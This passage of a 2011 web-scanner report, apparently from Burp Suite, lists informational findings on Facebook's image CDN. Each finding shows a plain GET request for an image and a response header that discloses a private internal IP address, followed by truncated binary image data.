The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /rsrc.php/v1/zP/r/FzmFaNDPhjU.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 4608
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:15 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Cache-Control: public, max-age=30241373
Expires: Tue, 03 Jul 2012 15:20:25 GMT
Date: Tue, 19 Jul 2011 14:57:32 GMT
Connection: close

.PNG
.
...IHDR...$...l.............IDATx^..iXS...5.Sj)m)Zk)..-..J..0.".A..80.....3...J.
.RGD...**("...(d$@..qB.L."E...:Qhi..b..A.g=....y....kO._.<..Q.L.M.M.-...L.x3M.y~.C."-_.c*.i(..<..i.........3..
...[SNIP]...

24.149. http://static.ak.fbcdn.net/rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.197

Request

GET /rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 171
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 17:08:10 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.145.197
X-Cnection: close
Cache-Control: public, max-age=20596192
Expires: Wed, 14 Mar 2012 00:07:26 GMT
Date: Tue, 19 Jul 2011 14:57:34 GMT
Connection: close

GIF89a............................bbb......5T................!.......,..........X..I)X8..{?.f.dY.`.l.A.B..$1(x..tA(..P..p|..r.@($,A..tb..)..B-.L....V.
.".C4q.......u.....;

24.150. http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/6DyuwYMrMc0.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zS/r/6DyuwYMrMc0.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.182

Request

GET /rsrc.php/v1/zS/r/6DyuwYMrMc0.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 11 Jul 2011 01:48:16 GMT
X-FB-Server: 10.138.69.182
Content-Length: 21551
Vary: Accept-Encoding
Cache-Control: public, max-age=30806170
Expires: Tue, 10 Jul 2012 04:14:07 GMT
Date: Tue, 19 Jul 2011 14:57:57 GMT
Connection: close

.PNG
.
...IHDR...!...............S.IDATx...yp....-..[..o.....eY..z....{.k.....Q...."......dGV... l......HH ... .x.{.KB...."......Tz..d....S..V........>...3.......$w.=...'$..v..;.H..Bh...wH..Q..n.
...[SNIP]...

24.151. http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/ccgKJX0yQZC.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zS/r/ccgKJX0yQZC.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /rsrc.php/v1/zS/r/ccgKJX0yQZC.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 07 Jun 2011 17:59:39 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 3020
Vary: Accept-Encoding
Cache-Control: public, max-age=28380367
Expires: Tue, 12 Jun 2012 02:23:30 GMT
Date: Tue, 19 Jul 2011 14:57:23 GMT
Connection: close

.PNG
.
...IHDR.......0...........
CiCCPICC profile..x..SwX...>..e.VB....l.."#....Y....a...@...
V....HU...
H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p
...[SNIP]...

24.152. http://static.ak.fbcdn.net/rsrc.php/v1/zT/r/dDagbUnwf34.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zT/r/dDagbUnwf34.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.197

Request

GET /rsrc.php/v1/zT/r/dDagbUnwf34.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/careers/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 55176
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:14 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Cache-Control: public, max-age=30424082
Expires: Thu, 05 Jul 2012 18:05:58 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

.PNG
.
...IHDR.............rl<....OIDATx^..w.-Yv......&.y.W........h.$H........D.G..IC.8...H$A.R$A...H..4L{W]].=...K...k&..XwUMa.X...Z."...{#..........W........i....3Ms:\...\........0..,.
....f..g.
...[SNIP]...

24.153. http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/gLuMARNlxxj.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zU/r/gLuMARNlxxj.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.185

Request

GET /rsrc.php/v1/zU/r/gLuMARNlxxj.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 667
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:16 GMT
X-FB-Server: 10.138.64.185
Cache-Control: public, max-age=30198653
Expires: Tue, 03 Jul 2012 03:28:51 GMT
Date: Tue, 19 Jul 2011 14:57:58 GMT
Connection: close

.PNG
.
...IHDR.......4.....[.#M...#PLTE......;Y....;}"p^P......n.......Pm.....v.....b.M/d.......q../Gz...Wp.Zs....^v............Wq.W.....n..p.....x....b..s...........:.\.............C`.Kg..........
...[SNIP]...

24.154. http://static.ak.fbcdn.net/rsrc.php/v1/zV/r/-pf2bdz3vEg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zV/r/-pf2bdz3vEg.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /rsrc.php/v1/zV/r/-pf2bdz3vEg.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/directory/people/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 231
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 12:49:56 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.145.196
X-Cnection: close
Cache-Control: public, max-age=20580622
Expires: Tue, 13 Mar 2012 19:47:59 GMT
Date: Tue, 19 Jul 2011 14:57:37 GMT
Connection: close

GIF89a..........Da....;Y.......q........Je.Lg.........|.....Sm.@].Hd.Vp.=Z....Wq....Ie.Xr....Fb.?\..........!.......,..........d.'.....#.l+bH'....ZW4YSt..K.q."..B l.: .......K.0..:......"."A,..f.. ..
...[SNIP]...

24.155. http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/1gBp2bDGEuh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zY/r/1gBp2bDGEuh.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.184

Request

GET /rsrc.php/v1/zY/r/1gBp2bDGEuh.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 143
Content-Type: image/gif
Last-Modified: Mon, 15 Mar 2010 12:39:11 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.16.184
Cache-Control: public, max-age=20666477
Expires: Wed, 14 Mar 2012 19:39:10 GMT
Date: Tue, 19 Jul 2011 14:57:53 GMT
Connection: close

GIF89a....................................iii...............!.......,.........<0.I..
.;..Al.71d.....0|.*....v6.+........R...h. ..2.$..lB...;

24.156. http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/6HL8HSM452G.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zY/r/6HL8HSM452G.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.184

Request

GET /rsrc.php/v1/zY/r/6HL8HSM452G.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 963
Content-Type: image/png
Last-Modified: Mon, 11 Jul 2011 01:48:16 GMT
X-FB-Server: 10.138.17.184
Cache-Control: public, max-age=30840135
Expires: Tue, 10 Jul 2012 13:40:12 GMT
Date: Tue, 19 Jul 2011 14:57:57 GMT
Connection: close

.PNG
.
...IHDR.......k......
.o...5PLTE........;..<....rS...........;..Z....;.....=...sy..........fm{......Ok...<.G.......rS..k........=..[.....YHPa........[..Y..Z.LM...rpm......n...sS;Y....wuq.l3
...[SNIP]...

24.157. http://static.ak.fbcdn.net/rsrc.php/v1/z_/r/2Oin6nHA4Mx.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z_/r/2Oin6nHA4Mx.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /rsrc.php/v1/z_/r/2Oin6nHA4Mx.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 252
Content-Type: image/png
Last-Modified: Wed, 02 Mar 2011 05:36:29 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Cache-Control: public, max-age=24751328
Expires: Tue, 01 May 2012 02:20:00 GMT
Date: Tue, 19 Jul 2011 14:57:52 GMT
Connection: close

.PNG
.
...IHDR...................HPLTE........................................................................aO9....oIDATx^..G..A.DQ......oJ#.. v..Oe.r^L....i.O..U.E!j.!...M.9.l>....o...........%"
...[SNIP]...

24.158. http://static.ak.fbcdn.net/rsrc.php/v1/zb/r/3LyZkLVshsc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zb/r/3LyZkLVshsc.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /rsrc.php/v1/zb/r/3LyZkLVshsc.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 14:02:44 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.191
X-Cnection: close
Cache-Control: public, max-age=20585087
Expires: Tue, 13 Mar 2012 21:02:34 GMT
Date: Tue, 19 Jul 2011 14:57:47 GMT
Connection: close

GIF89a.............!.......,...........D..;

24.159. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/1x0T5GU6FqP.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ze/r/1x0T5GU6FqP.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.186

Request

GET /rsrc.php/v1/ze/r/1x0T5GU6FqP.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 71
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 14:37:52 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.186
Cache-Control: public, max-age=20587199
Expires: Tue, 13 Mar 2012 21:37:33 GMT
Date: Tue, 19 Jul 2011 14:57:34 GMT
Connection: close

GIF89a.......;Y.D`.Zs.ay.............!.......,...........(............;

24.160. http://static.ak.fbcdn.net/rsrc.php/v1/zh/r/HNHvoJkgN6x.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zh/r/HNHvoJkgN6x.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /rsrc.php/v1/zh/r/HNHvoJkgN6x.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:18 GMT
X-FB-Server: 10.138.16.183
Content-Length: 16711
Vary: Accept-Encoding
Cache-Control: public, max-age=30424651
Expires: Thu, 05 Jul 2012 18:15:28 GMT
Date: Tue, 19 Jul 2011 14:57:57 GMT
Connection: close

.PNG
.
...IHDR.......>.....].(.....tRNS...... .....@.IDATx^..A........M%...i3..aFt2=.tP.@.....[....1...=h5.G""..A.. ..C&dB&.. ..)3{.dB... ..)F.J..j...dB&d.g.|_.
.8....Qo{.L. D..X...}!Y.WF..EA).&..N
...[SNIP]...

24.161. http://static.ak.fbcdn.net/rsrc.php/v1/zi/r/PbmUudSYZ0z.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zi/r/PbmUudSYZ0z.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.197

Request

GET /rsrc.php/v1/zi/r/PbmUudSYZ0z.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:13 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Content-Length: 12026
Vary: Accept-Encoding
Cache-Control: public, max-age=30424070
Expires: Thu, 05 Jul 2012 18:05:24 GMT
Date: Tue, 19 Jul 2011 14:57:34 GMT
Connection: close

.PNG
.
...IHDR...-...........#....tRNS...... .......IDATx^..1..@..q.u...h..VM
B..-E..t....SK......Q..]....o..=.y.W.n..:.@.....C....!@..........T..hJ=.......Z...-. .........:$.Y...>.zo.t8.........j.
...[SNIP]...

24.162. http://static.ak.fbcdn.net/rsrc.php/v1/zl/r/6N9FQPpTHCy.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zl/r/6N9FQPpTHCy.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.195

Request

GET /rsrc.php/v1/zl/r/6N9FQPpTHCy.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 820
Content-Type: image/png
Last-Modified: Tue, 07 Jun 2011 17:59:39 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Cache-Control: public, max-age=28380419
Expires: Tue, 12 Jun 2012 02:24:23 GMT
Date: Tue, 19 Jul 2011 14:57:24 GMT
Connection: close

.PNG
.
...IHDR.......0.............sRGB.........bKGD............. pHYs.................tIME.....2........"tEXtComment.Created with GIMP on a Mac..wC....IDATx^...m.0..P%...6vo.#_&....,......#@.....V
...[SNIP]...

24.163. http://static.ak.fbcdn.net/rsrc.php/v1/zp/r/-dio0u9UIlC.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zp/r/-dio0u9UIlC.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.198

Request

GET /rsrc.php/v1/zp/r/-dio0u9UIlC.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 9600
Content-Type: image/png
Last-Modified: Wed, 29 Jun 2011 21:13:46 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Cache-Control: public, max-age=30196906
Expires: Tue, 03 Jul 2012 02:59:28 GMT
Date: Tue, 19 Jul 2011 14:57:42 GMT
Connection: close

.PNG
.
...IHDR..............r-.....tRNS...... .....%5IDATx^..?..E....6....{.F...,l..,....7..iR. .H..".6...2.
..C0j....2.=g.!...a.............].......[._=\...7......f.:..W..7l...W...)..0....kkG.?.M.
...[SNIP]...

24.164. http://static.ak.fbcdn.net/rsrc.php/v1/zr/r/XXVvDYAks_i.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zr/r/XXVvDYAks_i.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.182

Request

GET /rsrc.php/v1/zr/r/XXVvDYAks_i.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 667
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:48:32 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.16.182
Cache-Control: public, max-age=20580600
Expires: Tue, 13 Mar 2012 19:47:46 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

.PNG
.
...IHDR...'... ......x......PLTE......:X....;X.;X.Nh.;Y.,Bq,Cr;Y.;Y....;Y.......':c:W.7S.:X.*@l..2.Eu@]..#...+An......,Br:X.9W.9W.Zt....az.Vq.To.Pk.Xs.e}.e~.;Y....q..f~.Ea.c|.x........Ql.w..
...[SNIP]...

24.165. http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/YoX0fw76s5z.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zs/r/YoX0fw76s5z.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.190

Request

GET /rsrc.php/v1/zs/r/YoX0fw76s5z.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/directory/people/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 48
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 12:51:36 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.190
X-Cnection: close
Cache-Control: public, max-age=20580844
Expires: Tue, 13 Mar 2012 19:51:41 GMT
Date: Tue, 19 Jul 2011 14:57:37 GMT
Connection: close

GIF89a.............!.......,.................
.;

24.166. http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/fzdZPrLUwxB.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zs/r/fzdZPrLUwxB.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.197

Request

GET /rsrc.php/v1/zs/r/fzdZPrLUwxB.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 10858
Content-Type: image/png
Last-Modified: Sun, 10 Jul 2011 12:18:43 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Cache-Control: public, max-age=30837934
Expires: Tue, 10 Jul 2012 13:03:05 GMT
Date: Tue, 19 Jul 2011 14:57:31 GMT
Connection: close

.PNG
.
...IHDR...$... ........:..*1IDATx^..-s.A.....+cQH..s....p'...H$
.A".HL..$@q..r.G...@....F.......R..U..L....t.............W^FL...?G..#N......mY.]..|.8.........q@.....#.}...2>.....!.k|.'...:...
...[SNIP]...

24.167. http://static.ak.fbcdn.net/rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.185

Request

GET /rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 14:22:33 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.185
Cache-Control: public, max-age=20586262
Expires: Tue, 13 Mar 2012 21:21:55 GMT
Date: Tue, 19 Jul 2011 14:57:33 GMT
Connection: close

GIF89a.......|.....!.......,...........D
.;

24.168. http://static.ak.fbcdn.net/rsrc.php/v1/zx/r/cDpiVvg8Q0u.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zx/r/cDpiVvg8Q0u.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /rsrc.php/v1/zx/r/cDpiVvg8Q0u.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Wed, 29 Jun 2011 21:13:44 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 21669
Vary: Accept-Encoding
Cache-Control: public, max-age=30314966
Expires: Wed, 04 Jul 2012 11:47:13 GMT
Date: Tue, 19 Jul 2011 14:57:47 GMT
Connection: close

.PNG
.
...IHDR...............B[....tRNS...... .....TZIDATx^...oSe..q./}7.....^`x#&.....3...f*d..M.........C....Zi..@q...G...... ...o..;'.$..=.1... =[..|...}.lYZ.[..X6...?.j.V.....d.......:.....L$..~
...[SNIP]...

24.169. http://static.ak.fbcdn.net/rsrc.php/v1/zz/r/z1xzUcShxUD.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zz/r/z1xzUcShxUD.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.182

Request

GET /rsrc.php/v1/zz/r/z1xzUcShxUD.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
